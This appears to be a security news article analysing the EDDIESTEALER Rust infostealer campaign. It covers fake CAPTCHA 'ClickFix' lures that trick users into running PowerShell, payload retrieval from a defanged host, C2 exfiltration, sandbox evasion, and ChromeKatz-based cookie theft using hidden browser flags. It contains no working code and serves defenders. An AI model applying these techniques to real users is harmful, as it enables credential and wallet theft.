EDDIESTEALER Malware
A new malware campaign has emerged, distributing an advanced Rust-based information stealer known as EDDIESTEALER. Leveraging a clever social engineering tactic called ClickFix, attackers lure users through fake CAPTCHA verification pages to execute malicious scripts. Once active, EDDIESTEALER harvests sensitive data such as credentials, browser data, and cryptocurrency wallet details.
Table of Contents
Infection Chain: From Fake CAPTCHA to Full-Blown Infostealer
The attack starts with legitimate websites being compromised with malicious JavaScript payloads. Visitors are shown a fake CAPTCHA page prompting them to "prove you are not a robot" via a three-step process.
The process involves:
- Opening the Windows Run dialog.
- Pasting a pre-copied command.
- Executing it to verify themselves.
This seemingly innocuous act triggers an obfuscated PowerShell command that fetches a next-stage payload from a remote server (llll[.]fit).
Payload Deployment and Stealthy Execution
The malicious JavaScript (gverify.js) is saved to the victim's Downloads folder and executed silently using cscript. This intermediate script's role is to retrieve the EDDIESTEALER binary from the same remote server, saving it with a random 12-character filename in the Downloads folder.
EDDIESTEALER malware is capable of:
- Collect system metadata.
- Receive instructions from a Command-and-Control (C2) server.
- Exfiltrate data from the infected system, including browser data, cryptocurrency wallets, password managers, FTP clients, and messaging apps.
Targets can be adjusted by the C2 operator. File access is handled using standard kernel32.dll functions like CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle.
Data Exfiltration and Anti-Analysis Features
After each task, the collected data is encrypted and sent to the C2 server via separate HTTP POST requests. To stay under the radar, the malware uses:
- String encryption.
- A custom WinAPI lookup mechanism to resolve API calls.
- A mutex to ensure only one instance runs.
- Checks for sandboxed environments, deleting itself if detected.
EDDIESTEALER can even delete itself by renaming NTFS Alternate Data Streams, similar to techniques used by Latrodectus malware, to bypass file locks.
Chromium Exploitation with ChromeKatz
One of the malware's most concerning features is its ability to bypass Chromium's app-bound encryption. It integrates a Rust implementation of ChromeKatz, an open-source tool designed to dump cookies and credentials from Chromium-based browsers.
If the targeted browser isn't running, EDDIESTEALER launches a hidden browser instance using the '--window-position=-3000,-3000 https://google.com command.' This allows it to access memory associated with the '-utility-sub-type=network.mojom. NetworkService' child process, ultimately extracting credentials.
Expanded Capabilities in Updated Variants
Recent versions of EDDIESTEALER can also gather:
- Running processes.
- GPU details.
- Number of CPU cores, CPU name, and vendor.
- System information (sent to the server even before task configuration).
Additionally, the encryption key used for client-to-server communication is hard-coded into the binary, enhancing operational security. The stealer can also launch a new Chrome process with '--remote-debugging-port=' to enable headless browser interactions over DevTools Protocol, no user interaction required.
Cross-Platform ClickFix Campaign
The use of Rust for EDDIESTEALER highlights a growing trend among malware developers, leveraging modern language features for stealth, stability, and evasion of detection.
This campaign is part of a broader effort by attackers to leverage ClickFix tactics across multiple platforms. Researchers at c/side have observed similar attacks targeting macOS, Android, and iOS. For macOS, the malicious JavaScript redirects to a page instructing victims to run a Terminal shell script, deploying the Atomic macOS Stealer (AMOS).
For Android, iOS, and Windows visitors, a drive-by download scheme deploys a separate Trojan malware, making this a highly versatile and cross-platform threat.
Conclusion
The EDDIESTEALER campaign demonstrates the effectiveness of social engineering combined with sophisticated malware development. Its advanced Rust-based core, cross-platform adaptability, and ability to bypass browser protections highlight the growing need for organizations and individuals to remain vigilant and proactive in their cybersecurity posture.
